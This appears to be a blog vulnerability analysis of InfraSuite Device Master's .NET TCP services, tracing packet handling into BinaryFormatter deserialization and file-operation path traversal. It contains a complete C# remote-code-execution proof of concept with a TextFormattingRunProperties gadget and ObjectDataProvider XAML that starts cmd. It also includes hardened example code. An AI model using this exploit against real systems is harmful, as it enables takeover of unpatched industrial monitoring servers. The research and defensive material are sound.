Warning
This article was last updated on 2022-11-08; its content may be out of date.
I saw that ZDI had published a pile of bugs (deserialization, directory traversal, permission bypass and so on), all of them in .NET, so this article came about.
The advisories ZDI published, as shown here:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/7e6763e3-fce8-9410-8ba0-eba3d72579aa.png)
Executables and the ports they listen on:
```
C:\Program Files\InfraSuite Device Master\Device-DataCollect\Device-DataCollect.exe   3000
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe           3100 3110
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe           80 443
```
https://www.zerodayinitiative.com/advisories/ZDI-22-1478/
This vulnerability lives on ports 3100 and 3110.
The path from the TCP server to the business-logic handler looks like this:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/7e7b643c-e258-dcb1-b0e5-66ca337612e5.png)
StartGatewayOperation sets up the gateway service's configuration.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/1dbec158-8eee-e877-ef55-c0c0ab0953ff.png)
TCP port initialization:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a5a305b5-cb64-9043-3c5c-f221477907a5.png)
It listens on both IPv4 and IPv6 on port DEFAULT_TCP_PORT.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/f9ec626c-945e-b7e2-b5f2-6e8f0e65d179.png)
this.InitialWebEngine() configures the web server.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/069ec782-d232-7a07-2401-a51fefabc1d3.png)
StartControlLayer starts a worker thread that runs the business logic,
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/be097f5a-1cfd-d10e-c0b3-bce33de67bbf.png)
namely MainLoop.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/be8bc5ee-2301-63a5-c67e-d852ab097cd7.png)
DoUpperLayerNWPacket does a switch/case on the i32PayloadType field of the PacketData's sHeader.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/6ae69209-d8fa-4cf3-fec6-6aa605d62cc4.png)
Pick any case:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/4d6bd007-1bdc-811c-93c5-77811af81616.png)
We see Serialization.DeSerializeBinary(sPacket.payload, out obj)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a4ba7f22-c20c-117d-5fee-6f21e37a5d56.png)
which is a straight BinaryFormatter call, nothing more to say about it. The key question is how to construct the payload.
To construct it we need to study the TCP handling logic. In the ControlLayerMngt constructor
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/ef5df9ee-ceaa-4559-94e2-62d42340a603.png)
a TCPServerConnectionMngt is initialized, and ModuleInitialization defines the send and receive events for the TCP connection.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fa38d405-f177-0438-310a-ebf3d960ad7f.png)
The requests we send to the server arrive as receive events, which are handled by ReceiveCallBack.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5e323f66-c722-453a-3467-a342680c9cec.png)
It performs an add and then a check operation.
add appends the incoming buffer to this._gRxPacketBytesBuffer, a variable-length store of the received bytes.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/ee22d7ae-c838-ef66-b366-aea4d083abbf.png)
check validates the packet format and reassembles a PacketData object,
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/8a2d186e-5178-aaa6-1b21-1ce5428b92f5.png)
then calls this.AddRxPacket(packetData) to add the reassembled packet to this._gRxPacketList.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/40c25c42-a6c7-da0e-0af4-6c9baa5a1103.png)
Back to MainLoop:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/3d886b3f-9993-3dca-ce6d-5c3afc151982.png)
```csharp
this.CheckUpperLayerNWPacket();
this.DoUpperLayerNWPacket();
```
Check calls ReceivePacket to see whether this._gRxPacketList holds any packets.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/58772bea-fcbf-d58d-d088-8b6f0af2f7c0.png)
ReceivePacket calls GetFirstRxPacket to take the first packet,
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a5237c99-3f69-f0af-0ef3-0a3b42355544.png)
then calls this._gUpperLayerNWPacketQueue.AddToSyncQueue(packetData) to push it onto the synchronized queue.
DoUpperLayerNWPacket simply takes the first packet off that queue.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/dbae1a97-b2ed-2a64-7c54-60a4d8b0ba7a.png)
From here any case will do; take CtrlLayerNWCmd_FileOperation as the example.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/6526d1b2-1eb0-ab1d-8602-53fa71c26b42.png)
It deserializes the payload field of the PacketData back into a CtrlLayerNWCommand_FileOperation business object, which then drives the next step of processing.
At this point we basically understand the architecture.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/df3341dd-9363-8bb3-bacc-03691714f0ce.png)
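To make the weak point concrete, here is a compact model of the MainLoop dispatch described above (switch on sHeader.i32PayloadType, then deserialize the payload), once as the article describes it and once hardened. This is an added example, not code from InfraSuite Device Master; the DTO shape, the `Packet` class, the payload-type constant and the size cap are assumptions standing in for the real InfraSuiteManager types.

```csharp
// Added example, not the InfraSuite code: the dispatch pattern from the article,
// vulnerable and hardened side by side. Names and constants are assumptions.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Text.Json;

// Stand-in for CtrlLayerNWCommand_FileOperation (hypothetical shape).
public sealed class FileOperationCommand
{
    public int Operation { get; set; }
    public string FileName { get; set; } = "";
}

// Stand-in for PacketData: the header fields the article names plus the raw payload.
public sealed class Packet
{
    public int PayloadType;
    public int PayloadSize;
    public byte[] Payload = Array.Empty<byte>();
}

public static class UpperLayerDispatch
{
    public const int PayloadType_FileOperation = 1;   // assumed value
    public const int MaxPayloadBytes = 64 * 1024;     // assumed cap

    // As in the article: the bytes the client framed go straight to BinaryFormatter.
    // Any gadget chain in the stream (TextFormattingRunProperties carrying
    // ObjectDataProvider XAML, for instance) executes inside Deserialize, before
    // the cast to the expected type is ever evaluated.
    public static FileOperationCommand VulnerableDispatch(Packet p)
    {
        switch (p.PayloadType)
        {
            case PayloadType_FileOperation:
#pragma warning disable SYSLIB0011 // BinaryFormatter is obsolete; .NET 8+ disables it by default
                var formatter = new BinaryFormatter();
                object obj = formatter.Deserialize(new MemoryStream(p.Payload));
#pragma warning restore SYSLIB0011
                return (FileOperationCommand)obj;
            default:
                throw new InvalidDataException($"unknown payload type {p.PayloadType}");
        }
    }

    // Hardened: reject inconsistent headers, cap the size, and parse with a
    // serializer that can only produce the one DTO this case expects. The stream
    // carries no type name for an attacker to redirect.
    public static FileOperationCommand HardenedDispatch(Packet p)
    {
        if (p.PayloadSize != p.Payload.Length || p.PayloadSize > MaxPayloadBytes)
            throw new InvalidDataException("payload size mismatch or too large");

        switch (p.PayloadType)
        {
            case PayloadType_FileOperation:
                var opts = new JsonSerializerOptions { MaxDepth = 8 };
                return JsonSerializer.Deserialize<FileOperationCommand>(p.Payload, opts)
                       ?? throw new InvalidDataException("empty payload");
            default:
                throw new InvalidDataException($"unknown payload type {p.PayloadType}");
        }
    }

    public static void Main()
    {
        // Constructed benign packet for the hardened path.
        byte[] body = Encoding.UTF8.GetBytes("{\"Operation\":1,\"FileName\":\"status.txt\"}");
        var packet = new Packet { PayloadType = PayloadType_FileOperation, PayloadSize = body.Length, Payload = body };
        FileOperationCommand cmd = HardenedDispatch(packet);
        Console.WriteLine($"op={cmd.Operation} file={cmd.FileName}");

        // The same packet with a lying i32PayloadSize is refused before any parsing.
        packet.PayloadSize = 1;
        try { HardenedDispatch(packet); }
        catch (InvalidDataException e) { Console.WriteLine($"refused: {e.Message}"); }
    }
}
```

The point of the hardened variant is not a SerializationBinder allow-list on top of BinaryFormatter (Microsoft's guidance is that BinaryFormatter cannot be made safe) but removing the attacker's control over which type gets instantiated: each payload type maps to exactly one DTO, and the length in the header is checked against the bytes actually received before anything is parsed.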
So writing the exploit is just a matter of copying the target's own packet code wholesale.
```csharp
using InfraSuiteManager.Common;              // PacketData, PacketOperation, Serialization: referenced from the target's own assembly
using System;
using System.IO;
using System.Net.Sockets;
using System.Runtime.Serialization;
using Microsoft.VisualStudio.Text.Formatting;  // TextFormattingRunProperties gadget (Microsoft.VisualStudio.Text.UI.Wpf)

namespace ConsoleApp1
{
    internal class Program
    {
        // ysoserial.net-style TextFormattingRunProperties gadget: when the server
        // deserializes it, the ForegroundBrush string is parsed as XAML, so the
        // ObjectDataProvider payload below executes.
        [Serializable]
        public class TextFormattingRunPropertiesMarshal : ISerializable
        {
            protected TextFormattingRunPropertiesMarshal(SerializationInfo info, StreamingContext context)
            {
            }

            string _xaml;

            public void GetObjectData(SerializationInfo info, StreamingContext context)
            {
                // Rewrite the serialized type name so the server instantiates
                // TextFormattingRunProperties instead of this marshal class.
                Type typeTFRP = typeof(TextFormattingRunProperties);
                info.SetType(typeTFRP);
                info.AddValue("ForegroundBrush", _xaml);
            }

            public TextFormattingRunPropertiesMarshal(string xaml)
            {
                _xaml = xaml;
            }
        }

        static void Main(string[] args)
        {
            // 1.txt holds the ObjectDataProvider XAML shown below.
            string xaml_payload = File.ReadAllText(@"1.txt");
            TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload);

            // Reuse the target's own PacketData/PacketOperation so the framing matches exactly.
            PacketData packet = new PacketData();
            PacketOperation packetOperation = new PacketOperation();
            if (!Serialization.SerializeBinary(payload, out packet.payload))
            {
                Console.WriteLine("serialize error.");
            }
            packet.sHeader.i32PayloadSize = packet.payload.Length;

            byte[] byTxPacket;
            packetOperation.MakePacketBytes(packet, out byTxPacket);

            // Port 3000 is Device-DataCollect in the port table above; the Gateway listens on 3100/3110.
            TcpClient tcpClient = new TcpClient("172.16.9.136", 3000);
            NetworkStream stream = tcpClient.GetStream();
            var b = new BinaryWriter(stream);
            b.Write(byTxPacket);
            stream.Close();
            tcpClient.Close();
            Console.WriteLine("done.");
            Console.ReadKey();
        }
    }
}
```
```xml
<?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c notepad" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>
```
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/186e6f69-48d6-c769-42ad-4a21ab696f18.png)
For Device-DataCollect, switching on packetData.sHeader.i32PayloadType lets us reach case 1:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/e90344ae-6da4-5d56-edd8-0a273e755cb7.png)
InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt.DCLNWCmd_DCServerStatus(ref PacketData)
There is a deserialization here as well.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/9173b0f1-5729-15e2-8fb1-8218ecd2a4f2.png)
I won't write out the payload construction; Device-DataCollect and Device-Gateway share much the same architecture, so the packet is built with PacketOperation in the same way.
The other bugs differ only in which case they land in, so below I only note where each vulnerability sits.
InfraSuiteManager.ControlLayer.ControlLayerMngt.CtrlLayerNWCmd_FileOperation(ref PacketData)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/30c2ab17-6b21-0f58-4bd5-e02993732758.png)
The fileName parameter is attacker-controlled, giving cross-directory arbitrary file write plus arbitrary file delete.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/0cc9a77a-51d0-d366-8c10-b8d3f2e9b730.png)
The fileName parameter leads to arbitrary file read.
I couldn't work this one out; it feels like a path traversal during archive extraction.
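The two file-operation findings above (traversal write and delete, and traversal read) share one root cause: fileName from the packet is joined onto a base directory with no containment check. The following is an added example, not InfraSuite's code, showing the unsafe join beside a contained one; the base directory, the helper names and the sample inputs are assumptions for illustration.

```csharp
// Added example, not the InfraSuite code: unsafe vs. contained handling of an
// attacker-supplied fileName. Base directory and helper names are assumed.
using System;
using System.IO;

public static class FileOperationHandler
{
    // Vulnerable: fileName flows straight into Path.Combine. "..\..\x" walks out
    // of baseDir, and a rooted name such as @"C:\Windows\win.ini" makes
    // Path.Combine discard baseDir entirely.
    public static string VulnerablePath(string baseDir, string fileName)
    {
        return Path.Combine(baseDir, fileName);
    }

    // Contained: refuse rooted names, canonicalize, then require the result to
    // stay under baseDir. Returns null when the name would escape.
    public static string ContainedPath(string baseDir, string fileName)
    {
        if (string.IsNullOrEmpty(fileName) || Path.IsPathRooted(fileName))
            return null;
        if (fileName.IndexOfAny(Path.GetInvalidPathChars()) >= 0)
            return null;

        // Canonical base with a trailing separator, so the prefix test cannot be
        // satisfied by a sibling directory whose name merely starts with baseDir.
        string root = Path.GetFullPath(baseDir);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;

        // GetFullPath resolves "." and ".." components before the comparison.
        string full = Path.GetFullPath(Path.Combine(root, fileName));
        return full.StartsWith(root, StringComparison.OrdinalIgnoreCase) ? full : null;
    }

    private static string Resolve(string baseDir, string fileName)
    {
        return ContainedPath(baseDir, fileName)
            ?? throw new UnauthorizedAccessException($"refused path: {fileName}");
    }

    // The three operations the article attributes to CtrlLayerNWCmd_FileOperation,
    // each routed through the containment check.
    public static void WriteFile(string baseDir, string fileName, byte[] data)
        => File.WriteAllBytes(Resolve(baseDir, fileName), data);

    public static void DeleteFile(string baseDir, string fileName)
        => File.Delete(Resolve(baseDir, fileName));

    public static byte[] ReadFile(string baseDir, string fileName)
        => File.ReadAllBytes(Resolve(baseDir, fileName));

    public static void Main()
    {
        string baseDir = @"C:\ProgramData\InfraSuite\Files";   // assumed base directory

        // Traversal and rooted names: unsafe join leaves baseDir, contained join refuses.
        Console.WriteLine(VulnerablePath(baseDir, @"..\..\..\Windows\System32\evil.dll"));
        Console.WriteLine(ContainedPath(baseDir, @"..\..\..\Windows\System32\evil.dll") ?? "(refused)");
        Console.WriteLine(VulnerablePath(baseDir, @"C:\Windows\win.ini"));
        Console.WriteLine(ContainedPath(baseDir, @"C:\Windows\win.ini") ?? "(refused)");

        // A legitimate relative name still resolves under baseDir.
        Console.WriteLine(ContainedPath(baseDir, @"reports\2022\status.txt"));
    }
}
```

Two caveats a reviewer would raise on the contained version: it reasons about paths, not about the filesystem, so a junction or symlink planted inside baseDir by another route would still redirect a write outside it (opening with FileShare/FileOptions that reject reparse points, or running the service with least privilege over the directory, closes that gap), and on Windows the trailing-dot, trailing-space and `file.txt:stream` alternate-data-stream forms are worth rejecting explicitly when the name is later used to pick a file type.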
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/db3c97ec-c3b2-a0ac-6d6a-8616bb1c2979.png)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5efbfe5a-0f2f-5b59-ed46-981c78db899b.png)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/66c166c1-ec57-f615-07d4-b2181e35aecc.png)
A very classic .NET TCP server vulnerability. Tracing how the server's TCP packet handling ties into its business logic in particular deepened my understanding of .NET.
My writing is rubbish, the wording flippant, the content shallow and the technique clumsy. Corrections and pointers from the masters are welcome and much appreciated.